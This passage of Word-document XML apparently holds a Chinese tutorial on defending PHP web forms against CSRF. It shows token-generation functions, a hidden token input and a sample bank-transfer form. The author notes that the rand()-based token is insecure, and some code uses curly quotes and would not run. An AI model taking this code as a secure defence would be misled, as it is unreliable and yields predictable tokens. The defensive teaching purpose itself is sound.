        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>这里我是贪方便，实际上单使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>Rand()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>得出的随机数作为令牌，也是不安全的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>这个可以参考我写的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>Findbugs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>笔记中的</w:t>
      </w:r>
      <w:hyperlink r:id="rId274" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:color w:val="3D81EE"/>
          </w:rPr>
          <w:t>《</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:color w:val="3D81EE"/>
          </w:rPr>
          <w:t>Random object created and used only once</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:color w:val="3D81EE"/>
          </w:rPr>
          <w:t>》</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>uniqid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>rand</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="190" name="图片 15" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>2).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>然后是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>令牌生成函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(gen_stoken())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="189" name="图片 16" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     &lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> gen_stoken() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$pToken = ""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_SESSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[STOKEN_NAME]  ==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$pToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>没有值，赋新值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_SESSION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[STOKEN_NAME] =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>gen_token();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>else{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>继续使用旧的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="188" name="图片 17" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3).WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">表单生成隐藏输入域的函数：　　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="187" name="图片 18" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     &lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     function gen_input() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     gen_stoken();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>          echo “&lt;input type=\”hidden\” name=\”" . FTOKEN_NAME . “\”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>     value=\”" . $_SESSION[STOKEN_NAME] . “\”&gt; “;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="186" name="图片 19" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>4).WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>表单结构：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="185" name="图片 20" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>session_start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(”functions.php”);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     &lt;form method=”POST” action=”transfer.php”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          &lt;input type=”text” name=”toBankId”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          &lt;input type=”text” name=”money”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          &lt;? gen_input(); ?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>          &lt;input type=”submit” name=”submit” value=”Submit”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>     &lt;/FORM&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="184" name="图片 21" descr="复制代码">
